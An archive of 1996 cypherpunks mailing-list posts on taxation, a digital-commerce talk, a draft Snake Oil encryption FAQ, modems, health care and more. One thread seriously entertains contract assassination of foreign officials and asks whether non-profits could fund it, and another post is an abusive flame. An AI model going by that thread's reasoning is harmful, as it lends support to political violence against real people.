SIGNATURE----- From tcmay at got.net Tue Sep 17 16:58:32 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 07:58:32 +0800 Subject: Wealth Tax vs. Capital Gains Tax Reduction Message-ID: I've been thinking a lot about the prospects of a "wealth tax," or "asset tax," in the U.S. With the stock market averages at record levels (and, hey, Intel has gone up $6 just so far today, to an unheard of $94.5 level), and with increasing fractions of people's overall net worth tied up in equities, bonds, houses, property, etc., it may be that the looters will take a more serious look at taxing people's overall wealth, e.g., the 5% of net worth per year that some countries have. (At the same time, there is also a chance that the tax on capital gains will be greatly reduced or even possibly eliminated, also as some countries such as Japan have already done.) The conundrum is this: so long as stocks, bonds, and other holdings are not taxable while unsold, and so long as large amounts of private pension funds and whatnot are flowing into equities, this wealth is "unreachable" to the government tax collectors. Further, much of this wealth is "locked" by the high marginal tax rates on capital gains (35-40%, depending on which state one lives in, on so-called "tax preference items," etc.) Many people will not sell assets if they have to pay 35-40% to the tax man if they sell, but nothing if they just sit on the asset and watch it go up in value. (Obviously, the assets get sold eventually. But many people will choose to simply not worry about the heavy taxes _this_ year, and delay selling 'til some future date. They may also think the capital gains rates will go down, or may have visions of taking their stock certificates and simply moving to Anguilla :-}.) If this trend continues--more money in equities and investments, and a higher overall valuation (as prices are driven up by more folks getting in, and by other conventional factors)--the government would seem to have two main choices: 1. Start taxing the overall wealth, e.g., 5% per year. 2. Reduce capital gains taxes so that the "locked assets" will at least come to market and generate some income from capital gains, even if at a reduced level. At 6:38 PM 9/17/96, Duncan Frissell wrote: >Note too the recent article in the Economist about how European firms are >raising capital in the UK and the US because it is available there in >private pension savings while European government retirement systems suck >loads of capital out of the system leaving nothing but massive government >debts. The flow of capital into equities is truly astounding. Some fraction of Americans are really preparing themselves well for retirement, emergencies, vacations, etc. Of course, a distressing fraction of Americans have no savings plans to speak of, and will essentially have no money as they age. Needless to say, I despise the idea of a "wealth tax," and I can see various loopholes and workarounds. I'd also expect a lot of folks to simply move out of the country if this were to happen. In the current political climate, I'd say the chance of a wealth tax in the next several years is small. Ditto for a capital gains tax rate reduction. As with selling assets, "doing nothing" is often the likeliest path. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From rah at shipwright.com Tue Sep 17 17:18:47 1996 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 18 Sep 1996 08:18:47 +0800 Subject: DCSB: Putting a Stock Exchange on the Net Message-ID: -----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL----- The Digital Commerce Society of Boston Presents Philippe Le Roux Associe de V(DL)2 Inc. "Putting a Stock Exchange on the Net" Tuesday, October 1, 1996 12 - 2 PM The Downtown Harvard Club of Boston One Federal Street, Boston, MA Philippe would like to talk about putting the Montreal Stock Exchange on the Web - building the Net strategy, the implementation, the management tools, and the impacts on the organization. If we can get a connection and digital projector, he'll demo the project. Philippe Le Roux has worked for more than 15 years implementing new technologies and analizing their socio-economic impact. Extensively involved in the launching of Minitel in France and then Alex in Quebec, he has worked with many groups involved with the Internet and On-Line Services. For more than 10 years he's been giving conferences on telematique and information highways in Europe, North and South America. He is the North American correspondent for Planete Internet (France) and regularly publishes articles in France, Quebec and the U.S. He is co-author with Carol Baroudi and John Levine of Internet Secrets (IDG Books 1995), and, under the direction of Pierre Musso and Jean Zeitoun, the book Le Metafort D'Aubervillers (Editions Charles Le Bouil (France) 1995). This meeting of the Digital Commerce Society of Boston will be held on Tuesday, October 1, 1996 from 12pm - 2pm at the Downtown Branch of the Harvard Club of Boston, One Federal Street. The price for lunch is $27.50. This price includes lunch, room rental, and the speaker's lunch. ;-). The Harvard Club *does* have dress code: jackets and ties for men, and "appropriate business attire" for women. We need to receive a company check, or money order, (or, if we *really* know you, a personal check) payable to "The Harvard Club of Boston", by Saturday, September 28, or you won't be on the list for lunch. Checks payable to anyone else but The Harvard Club of Boston will have to be sent back. Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they *must* be made payable to "The Harvard Club of Boston". If anyone has questions, or has a problem with these arrangements (We've had to work with glacial A/P departments more than once, for instance), please let us know via e-mail, and we'll see if we can work something out. Planned speakers for DCSB are: November Philip S. Corwin Regulatory Barriers to Internet Commerce December "Black Unicorn" Money Laundering: The Headless Horseman of the Infocalypse January TBA 1996 in Review / Predictions for 1997 We are actively searching for future speakers. If you are in Boston on the first Tuesday of the month, and you would like to make a presentation to the Society, please send e-mail to the DCSB Program Commmittee, care of Robert Hettinga, rah at shipwright.com . For more information about the Digital Commerce Society of Boston, send "info dcsb" in the body of a message to majordomo at ai.mit.edu . If you want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a message to majordomo at ai.mit.edu . Looking forward to seeing you there! Cheers, Robert Hettinga Moderator, The Digital Commerce Society of Boston -----BEGIN PGP SIGNATURE-----BY SAFEMAIL----- Version: 1.0, engine e19 iQCVAwUBMj79w/gyLN8bw6ZVAQGXkgQAi0nFz95uK6rBGSCvsP8hAvcolHKbRrFw dwOmt97TxvWTYgEczZQiEFwS+WFgo6yGkQGO8jkmYWDKIuyf/JLGr46YaH5GH/rS pKrWzgWnhRjX1vqesRrurcS3KuCK6EStZWLwJeRZzPc+s0fp0nv5p8mK2KaHxtRD 0eL3obNyUUk= =HTUA -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From declan at well.com Tue Sep 17 17:20:50 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 18 Sep 1996 08:20:50 +0800 Subject: Electronic cash, not letter boxes, stupid (darkside) hackers Message-ID: 9/16/96 HAMBURG, Germany (Reuter) - A German student who used the Internet for long-distance theft of computer data from a U.S. company was arrested and charged with extortion for demanding ransom for the return of the data, police said Monday. The student, from the city of Muenster in northern Germany, sent the ransom letter through electronic mail (e-mail), demanding that the firm pay $30,000 to a letter box in a Hamburg post office. Police declined to identify the company. A police spokesman said the student and two accomplices had illegally logged into its computers and stolen the data. Police said they were waiting at the letter box and detained a 19-year-old, who later led them to the 26-year-old ringleader. From geeman at best.com Tue Sep 17 17:22:26 1996 From: geeman at best.com (gee) Date: Wed, 18 Sep 1996 08:22:26 +0800 Subject: Snakeoil FAQ edit/comments Message-ID: <323ED007.57D@best.com> Matt: Thanks, and good work. My comments are indicated by [your text] in brackets, my comments >>> set off by >>>'s. To help separate, look for "-----------------------------" --------------------------- snake-oil-faq ---------------------------- Snake-Oil Warning Signs Encryption Software to Avoid $Id: snake-oil-faq.html,v 0.4 1996/09/16 13:52:26 cmcurtin Exp $ Distribution Please do not distribute this beyond the circles of cryptographic competence yet. This is an incomplete work-in-progress. Feedback is greatly appreciated. The Snake Oil FAQ is (to be) posted monthly to cypherpunks, sci.crypt, alt.security, comp.security, and comp.infosystems. We're targeting those who have influence over or direct involvement in the purchasing decisions of computer security software and equipment in the corporate and academic worlds, as well as individual users who wish to assert their privacy through the use of good cryptography. ----------------------------- >>> I wonder what a good assumption is about level-of-expertise. I should think rather low, since a more experienced person will not be in as much need of the doc in the first place. Think moderately-informed user: like the readers of InfoWorld, eh? Given that, there are several places where knowledge of the subject is assumed that the real consumer of the FAQ doesn't have. ----------------------------- Disclaimer All contributors' employers will no doubt disown any statements herein. We're not speaking for anyone but ourselves, based on our own experiences, etc., etc., etc. This is a general guideline, and as such, cannot be the sole metric by which a security product is rated, since there can be exceptions to any of these rules. ----------------------------- >>> Actually, I think there are some rules in here that there are no exceptions to. Check; nothing comes immediately to mind tho. ----------------------------- ----------------------------- [(But if you're looking at something that sounds familiar on several of the 'things to watch out for,' you're probably dealing with snake oil. ] >>> But if many of the items on the "Things to look out for" list seem to apply to a product, the product is very likely weak. ----------------------------- ----------------------------- >From time to time, a reputable and decent vendor will produce something that is actually quite good, but will use some [braindead] marketing technique, so be aware of exceptions. >>> "Braindead", eh, hmmmmm. Too dignified ;)----------------------------- Every effort has been made to produce an accurate and useful document, but the information contained herein is completely without warranty. If you find any errors, or wish to otherwise contribute, please contact the document keeper, C Matthew Curtin Introduction Good cryptography is an excellent and necessary tool for almost anyone. However, there is a multitude of products around. Many good cryptographic products are available, both commercial (including shareware) and free. However, there are also some extremely bad cryptographic products (known in the field as "Snake Oil"), which not only fail do their job of providing security, but are based on, and add to, the many misconceptions and misunderstandings surrounding cryptography and security. ----------------------------- >>> They also prey on the inexperience of the consumer, rely on the mystery and mystique of mathmatical-sounding jargon, to make poorly engineered products seem to be something they are not. ----------------------------- Superficially, it is difficult for someone to distinguish the output of a secure encryption utility from snake oil: both look garbled. The purpose of this document is >>> to <<< present some obvious "red flags" [so that] >>> which <<< people unfamiliar with the nuts and bolts of cryptography can use as a guideline for determining whether they're dealing with snake oil or the Real Thing. For a variety of reasons, this document is general in scope and does not mention specific products or algorithms as being "good" or "Snake Oil". When evaluating any product, be sure to understand what your needs are. For data security products, what do you need protected? Do you want an archiver that [supports strong encryption? ] ----------------------------- >>> Problem: what is "Strong Encryption" ??? From a user's point of view this term is too fuzzy. Try: "that will keep data secure from your kid sister? A rogue government? For 5 minutes? Etc. etc. " ----------------------------- ----------------------------- [An E-mail client? Something that will encrypt on-line communications? Do you want to encrypt an entire disk or partition, or selectively some files? Do you need on-the-fly (automatic) encryption and decryption, or are you willing to select when and which files you want encrypted? ] >>> I'd leave that out: not pertinent to snake-oil vs. Good Stuff, but is about the kind of application user requires. How secure is "secure enough?" Does the data need to be unreadable by third parties for 5 minutes? One year? 50 years? 100 years? >>> see above. ----------------------------- ----------------------------- [Different products will serve different needs, and it's rare that a product will serve every need. (Sometimes a product won't be needed: it may be better to use a utility to encrypt files, transmit them over a network using standard file transfer tools, and decrypt them at the other end than to use a separate encrypted utility in some cases.)] >>> I don't understand: "sometimes a product won't be needed?" I think this paragraph could be left out. After all, OS utility or Snoop-Dooper-Doggy-Doo-Ware product, ya still gotta know what you're doing, right? So you everthing in the FAQ still applies; or maybe I'm missing the point here. ----------------------------- Some basics The cryptography-faq (found at ftp://rtfm.mit.edu/pub/usenet/cryptography-faq/) is a more general tutorial of cryptography, and should also be consulted. In an effort to make this FAQ more complete, some very basic topics are included below. Conventional vs. Public Key Cryptography ----------------------------- There are two basic types of cryptosystems: symmetric (also known as "conventional," [sometimes also called] >>> or <<< "private key") and asymmetric (public key). Symmetric ciphers require both the sender and the recipient to have the same key. That key is [applied] >>> used by the cryptographic algorithm <<>> originated <<< by the sender, and again by the recipient to decrypt the data. Asymmetric ciphers are much more flexible, from a key management perspective. Each user has a pair of keys: a public key and a private key. The public key is shared widely, given to everyone, while the private key is kept secret. If Alice wishes to mail Bob some secrets, she simply gets Bob's public key, encrypts her message with it, and sends it off to Bob. When Bob gets the message, he uses is private key to decrypt the message. Asymmetric [cryptosystems] >>>algorithms<<< are much slower than [their symmetric counterparts.] >>> symmetric algorithms, and are almost exclusively used to encrypt short "session keys," which are then used to encrypt a message using the speedier symmetric algorithms. This use of public key cryptography is called "key exchange." ----------------------------- ----------------------------- [Also, key sizes must be much larger.] >>>I agree with one comment that discouraged comparing the 2 algo types.----------------------------- See the cryptography FAQ for a more detailed discussion of [the topic.] >>>these topics.<<< Key Sizes ----------------------------- Some ciphers, while currently secure against most attacks, are not considered viable in the next few years because of relatively small keysizes and increasing processor speeds [(making a brute-force attacks feasible).] >>> Again, I maintain that the audience for this stuff can't be relied upon to even know what that means. Try: "which makes the cipher vulnerable to breaking by trying every possible key combination (called a brute-force attack)." --- or something like that. ----------------------------- The tables below should give some general guidelines for making intelligent decisions about the key length you need. If the key is too short, the system will be easily broken, even if the cipher is a good one. In [1] and [2], we're presented with some guidelines for deciding appropriate key length. (It is important to note that this is based on the ability to predict computing power 40, 65, and 100 years from now. Major breakthroughs in computing power 30 years from now might render everything on this chart kiddieplay.) Security Requirements for Different Information Type of Traffic Lifetime Minimum [Symmetric] Key Length Tactical military information minutes/hours 56-64 bits Product announcements, mergers, interest rates days/weeks 64 bits Long-term business plans years 64 bits Trade secrets (e.g., recipe for Coca-Cola) decades 112 bits H-bomb secrets >40 years 128 bits Identities of spies >50 years 128 bits Personal affairs >50 years 128 bits Diplomatic embarrassments >65 years at least 128 bits U.S. Census data 100 years at least 128 bits ----------------------------- >>> Where is the attribution for the table?----------------------------- As mentioned earlier, asymmetric ciphers require significantly longer keys to provide the same level of security as their symmetric cipher counterparts. Here is a comparison table, again, from Applied Cryptography, second edition. Symmetric and Public-Key Lengths With Similar Resistance to Brute-Force Attacks Symmetric Key Length Public-key Key Length 56 bits 384 bits 64 bits 512 bits 80 bits 768 bits 112 bits 1792 bits 128 bits 2304 bits ----------------------------- >>> BEWARE, Danger: comparing public/private key cryptosystems again. I think if you really want to do so, then the comparison should really be explained. ----------------------------- Some Common Snake-Oil Warning Signs The following are some of the "red flags" one should watch for when examining an encryption product * Technobabble The vendor's description of the product may contain a lot of hard-to-follow use of technical terms to describe how the product works. If this appears to be confusing nonsense, it may very well be (even to someone familiar with the terminology). Technobabble is a good means of confusing a potential user and masking the fact that the vendor doesn't understand anything either. A sign of technobabble is a descrption which drops a lot of technical terms for how the system works without actually explaining how it works. Often specifically coined terms are used to describe the scheme which are not found in the literature. * New Type of Cryptography? Beware of any vendor who claims to have invented a "new type of cryptography" or a "revolutionary breakthrough". Truly "new break-throughs" are likely to show up in the >>> scientific <<< literature, and [many in the field] >>> professionals won't <<< [are unlikely to] trust them until after years of analysis, by which time they are not so new anymore. Avoid software which claims to use 'new paradigms' of computing such as cellular automata, neural nets, genetic algorithms, chaos theory, etc. Just because software uses to different method of computation doesn't make it more secure. ----------------------------- >>> As a matter of fact, these techniques are the subject of ongoing cryptographic research and nobody has published successful results based on their use yet. ----------------------------- Anything that claims to have invented a new [public key] cryptosystem without publishing the details or underlying mathematical principles is highly suspect. Modern cryptography, especially public key systems, is grounded in mathematical theory. The security is based on problems that are believed, if not known to be hard to solve. ----------------------------- >>> There are some other comments in cpunks on this last bit. I defer.----------------------------- The strength of any encryption scheme is only proven by the test of time, >>> involving exhaustive analysis by cryptographers<<<. New crypto is like new pharmaceuticals, not new cars. * Proprietary Algorithms Avoid software which uses "proprietary" or "secret" algorithms. Security through obscurity is not considered a safe means of protecting your data. If the vendor does not feel confident that the method used can withstand years of scrutiny by the [academic] >>> professional and academic cryptographic <<< community, then you should be wary of trusting it. (Note that a vendor who specializes in the cryptography may have a proprietary algorithm which they'll show to others if they sign a non-disclosure agreement. If the vendor is well-reputed in the field, this can be an exception.) ----------------------------- >>> How can you tell a well-reputed vendor? I am thinging of one co. that promises to release their algo. details upon NDA, but at least in my case the details never showed up! This is slippery here! ----------------------------- Beware of specially modified versions of well-known algorithms. This may intentionally or unintentionally weaken the cipher. The use of a trusted algorithm, >>> availability of <<< [if not with] technical notes explaining the implementation ([if not availability of] >>> and preferably <<< the source code for the product) are a sign of good faith on the part of the vendor that you can take apart and test the implementation yourself. A common excuse for not disclosing how a program works is that "hackers might try to crack the program's security." While this may be a valid concern, it should be noted that such 'hackers' can reverse engineer the program to see how it works anyway. If the program is implemented properly and the algorithm is secure, this is not a problem. (If a hypothetical 'hacker' was able to get access you your system, access to encrypted data might be the least of your problems.) ----------------------------- >>> Add: The strength of a cryptosystem should depend ONLY on the security of the keys involved, and not the security of the algorithm. ----------------------------- * Experienced Security Experts and Rave Reviews Beware of any product claiming that "experienced security experts" have analyzed it, but it won't say who (especially if the scheme has not been published in a reputable journal). Don't rely on reviews in newspapers, magazines or television shows, since they generally don't have cryptologists (celebrity hackers who know about telephone systems don't count) take the software apart for them. Just because the vendor is a well known company or the algorithm is patented doesn't make it secure either. * Unbreakability Some vendors will claim their software is "unbreakable". This is marketing hype, and a common sign of snake-oil. Avoid any vendor that makes unrealistic claims. ----------------------------- >>> The reader is not qualified to evaluate realistic/unrealistic.----------------------------- No algorithm is unbreakable. Even the best algorithms are breakable using "brute force" (trying every possible key), but if the key size is large enough, this is impractical even with vast amounts of computing power. One-time pads are unbreakable, but they must be implemented perfectly, which is, at best, very difficult. See the next section for a more detailed discussion. ----------------------------- >>> Add: Avoid products that use huge numbers to impress you that it would take massive amounts of time to break them. This is ONLY true under the assumption that the only way to break the system is by exhaustively trying every possible key, and this assumption hass to be proved before the claim is valid. A cryptosystem using a keylength of 50,000 bits theoretically would take 2 raised to the 50,000th power to break (a ridiculously large number) if, AND ONLY IF the algorithm had no weaknesses. The hard part of cryptosystem design is making an algorithm with no weaknesses, such that exhaustive brute-force search is the only method of breaking it, not using long keys. ----------------------------- * One-Time-Pads A vendor might claim the system uses a one-time-pad (OTP), which is theoretically unbreakable. That is, snake-oil sellers will try to capitalize on the known strength of a OTP. It is important to understand that any variation in the implementation means that it is not an OTP, and has nowhere near the security of an OTP. A OTP system is not an algorithm. It works by having a "pad" of random bits in the possession of both the sender and recipient. ----------------------------- >>> Explain what you mean by a "pad" --- using a term which to the newbie may not usually be associated with crypto. Origin being the pads of paper that they used to use etc.etc. ??? ----------------------------- ----------------------------- The message is encrypted using [the next n bits in the pad as they key, where n is the number of bits in the message] >>> as many bits from the key as there are bits in the message. That is, for each bit in the message, there is a random bit from the one-time-pad.<<< ----------------------------- After the bits are used from the pad, they're destroyed, and can never again be used. The bits in the pad must be truly random, generated using a real random source, such as specialized hardware, radioactive decay timings, etc., and not from an algorithm or cipher. Anything else is not a one-time-pad. The vendor may confuse random session keys or initialization vectors with OTPs. * Algorithm or product XXX is insecure Be wary of anything that makes claims that particular algorithms or other products are insecure without backing up those claims (or at least citing references to them). Sometimes attacks are theoretical or impractical (requiring special circumstances or massive computing power running for many years), and it's easy to confuse a layman by mentioning these. * Keys and Passwords The "key" and the "password" are often not the same thing. The "key" generally refers to the actual data used by the cipher, while the "password" refers to the word or phrase the user types in, which the software converts into the key (usually through a process called "hashing" or "key initialization"). >>> Other comments addressed this paragraph. I defer. The reason this is done is because the characters a user is likely to type in do not cover the full range of possible characters. (Such keys would be more redundant and easier for an attacker to guess.) By hashing a key can be made from an arbitrary password that covers the full range of possible keys. It also allows one to use longer words, or phrases and whole sentences as a "passphrase", which is more secure. Anything that restricts users' passwords to something like 10 or 16 or even 32 characters is foolish. If the actual "password" is the cipher's key (rather than hashing it into a key, as explained above), avoid it. If the vendor confuses the distinctions between bits, bytes and characters when discussing the key, avoid this product. Convenience is nice, but be wary of anything that sounds too easy to use. ----------------------------- >>> Instead, try: be wary of any product that overly emphasizes ease-of-use without due attention to its cryptographic strength. ----------------------------- Avoid anything that lets anyone with your copy of the software to access files, data, etc. without having to use some sort of key or passphrase. Avoid anything that doesn't let you generate your own keys (ie, the vendor sends you a key in the mail, or it's embedded in the copy of the software you buy). Avoid anything by a vendor who does not seem to understand the difference between public-key (asymmetric) cryptography and private-key (symmetric) cryptography. * Lost keys and passwords If there's a third-party utility that can crack the software, avoid it. >>> Which - the utility or the crypto? If the vendor claims it can recover lost passwords (without using a key-backup or escrow feature), avoid it. If there is a key-backup or escrow feature, are you in control of the backup, or does the vendor or someone else hold a copy of the key? * Exportable from the USA If the software is made in North America, can it be exported? If the answer is yes, chances are it's not very strong. Strong cryptography is considered munitions in terms of export from the United States, and requires approval from the State Department. Chances are if the software is exportable, the algorithm is weak or it is crackable (hence it was approved for export). If the vendor is unaware of export restrictions, avoid the software: the vendor is not familiar with the state of the art. Because of export restrictions, some legitimate (not-Snake Oil) products may have a freely exportable version for outside of the USA, which is different from a separate US/Canada-only distribution. Also note that just because software has made it outside of North America does not mean that it is exportable: sometimes a utility will be illegally exported and posted on an overseas site. Other Considerations Interface isn't everything: user-friendliness is an important factor, but if the product isn't secure then you're better off with something that is secure (if not as easy to use). No product is secure if it's not used properly. You can be the weakest link in the chain if you use a product carelessly. Do not trust any product to be foolproof, and be wary any product that claims it is. Contributors The following folks have contributed to this FAQ. Jeremey Barrett ----------------------------- >>> OK, you can use my RealName:Gregg Weissman <<< ----------------------------- Jim Ray Robert Rothenburg Walking-Owl References 1. B. Schneier, Applied Cryptography, second edition, John Wiley & Sons, 1996 2. M. Blaze, W. Diffie, R. L. Rivest, B. Schneier, T. Shimomura, E. Thompson, M. Wiener, "Minimal Key Lengths for Symmetric Ciphers to Provide Adequate Commercial Security," available via ftp://ftp.research.att.com/dist/mab/keylength.ps ---------------------------------------------------------------------------- C Matthew Curtin Last modified: Mon Sep 16 09:51:41 EDT ---------------------------------------------------------------------- -- C Matthew Curtin MEGASOFT, INC Chief Scientist I speak only for myself. Don't whine to anyone but me about anything I say. Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/ From Adamsc at io-online.com Tue Sep 17 17:25:20 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 08:25:20 +0800 Subject: 56 kbps modems Message-ID: <19960917192157468.AAA195@IO-ONLINE.COM> On Sun, 15 Sep 1996 01:31:19 -0700, Bill Stewart wrote: >and still get the original 56kbps back out. But if they can, well, >yee-hah, ISDN is nearly dead :-) (Not totally dead; the signalling is >still useful for some applications, the convenience of two channels on >one wire pair is nice, and the fact that people can get 56kbps without Also, can't you add ISDN b-channels ? (I.e. get another 64kps channel) >the phone company's help will pressure them into offering ISDN for >a lower price in areas where the Phone Company's idea of "all the market >will bear" is substantially higher than voice pricing.) ISDN is more elegant; this sounds like a 'kludge' of sorts. OTOH, we've all seen how well a cheap kludge can do, right? # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From paul at fatmans.demon.co.uk Tue Sep 17 17:28:14 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Wed, 18 Sep 1996 08:28:14 +0800 Subject: Diffie Hellman - logs in Galois fields Message-ID: <842988785.23058.0@fatmans.demon.co.uk> > I think polluting this mailing list with trivial questions such as this is > just as bad as polluting it with personal attacks. Read the FAQs. Get a fucking life, seeing as you haven`t yet posted anything relating remotely to the technical aspects of cryptography to this list I think you need to take a long hard look at what your saying loser.... Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From ses at tipper.oit.unc.edu Tue Sep 17 17:33:18 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 18 Sep 1996 08:33:18 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609171255.IAA00172@godzilla.athensnet.com> Message-ID: > So why in the world do those crazy Canadians keep coming here for > BTW, looking at historical costs of medical care and the level of >government involvement, it is safe to say that the US has too much >socialism in our medical system right now, and that it what's making the >best system (ours) so expensive when it would not be otherwise. I wouldn't be so proud of the US health care system; the actual quality of care is really pretty awful, even with insurance. Even though the NAtional Health Service in the uK is woefully underfunded, I've always had much better treatment than I have from HMOs here; even seeing a specialist privately, at home, with no insurance, is cheaper than getting an X-Ray looked at by someone who once met a radiologist a cocktail party. The UK split the provision of services from the purchasing, so that hospitals have to compete for business, and a HMO like funding model for primary care physicians - fixed capitation rates, so the more a doctor spends, the less money he/she makes). It may be that the most efficient solution for health-care is a hybrid scheme along these lines. There are ideological reasons that argue for rejecting such compulsory schemes based on that element of coercion; it's hard to make the case against purely on efficiency grounds. Simon --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From azur at netcom.com Tue Sep 17 17:36:24 1996 From: azur at netcom.com (Steve Schear) Date: Wed, 18 Sep 1996 08:36:24 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet Message-ID: >On Mon, 16 Sep 1996, Steve Schear wrote: > >> Someone wrote: > >> >The problem is that assasination rarely leads to the installation of >> >a government that is any better. In most cases it gets worse. > >[...] > >> We've all heard these arguments, but are they true? Who says so, and how >> can they be certain? Jim's suggestion has never, to my knowledge, been >> tried on a consistant, large, scale. When all conventional alternatives >> have been tried and fail, what have we or the starving children got to >> lose? > >I think "Lord of the Flies" answers this question quite well. Does it? LOTF was fiction. Can you identify a recent instance in which a non-governmental organization attempted to influence political/military events via a concerted AP? > >> Is it legal for citizens of the U.S. to engage in contract killing of >> foreign military, politations, etc? How about U.S. or foreign non-profits? > >As to the first, yes. (There are several anti-mercenary statutes on the >books) As to the second, I don't understand the question. > So, you're saying it is legal for citizens? The second question was whether a non-profit org. could raise tax-deductible funds to conduct such operations. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From Adamsc at io-online.com Tue Sep 17 17:44:16 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 08:44:16 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: <19960917191852828.AAA142@IO-ONLINE.COM> On Sat, 14 Sep 1996 23:58 EDT, E. Allen Smith wrote: >fetters to win. (In the ultimate extreme, I include gun control under the >fetters that communism/etcetera need to win... the "redistribution" from >producers ("rich") to welfare drones ("poor") during the Rodney King riots >would have been nicely prevented by some shopkeepers with automatic weapons. As I recall this actually happened in a couple cases, didn't it? # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From fletch at ain.bls.com Tue Sep 17 17:53:00 1996 From: fletch at ain.bls.com (Mike Fletcher) Date: Wed, 18 Sep 1996 08:53:00 +0800 Subject: Anthrax on the 'net [Was Re: Fear of Flying -- from HotWired ] In-Reply-To: <19960917173431968.AAA223@IO-ONLINE.COM> Message-ID: <9609172114.AA26321@outland> >>Gee, biotech has come a long way. Now I can download the Anthrax DNA >>sequence from the net and insert it in some carrier bacteria and start >>making Anthrax bacteria. Neat! > Now the bad news: the DNA replicator only works under Windows 95 and comes > with buggy drivers! Buggy drivers? But isn't that the point in this case? :) > Unfortunately, it can be very deadly. The idea here is that it rarely infect s > humans - in the normal course of events. If a determined biowarrior is tryin g > to infect people, all bets are off. The Frank Herbert (of _Dune_ fame) book _White Plague_ comes to mind. Basically a molecluar biologist's wife and kids are killed by an IRA bomb while visiting Dublin. He snaps and creates a plague which kills women (men are carriers) as revenge. All without using that nasty Internet (in fact, the book was written back before even ARPAnet). --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. | 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------ From Adamsc at io-online.com Tue Sep 17 17:58:45 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 08:58:45 +0800 Subject: Uses of Computational Chaos Message-ID: <19960917191720703.AAA221@IO-ONLINE.COM> On Sat, 14 Sep 1996 23:37 EDT, E. Allen Smith wrote: > It is reasonably obvious that using _computational_ (as opposed to >physical) chaos won't increase entropy. But how about using it to make an >attacker work harder to use any flaws in your method of generating random >bits? As a simplistic example, say that the scribble window you're using tends >to result in a 1 for each 3rd bit. Nice and simple for an attacker to exploit. Supposing, too, that you know these weaknesses, would using separate algorithms for different portions of the number work well? # 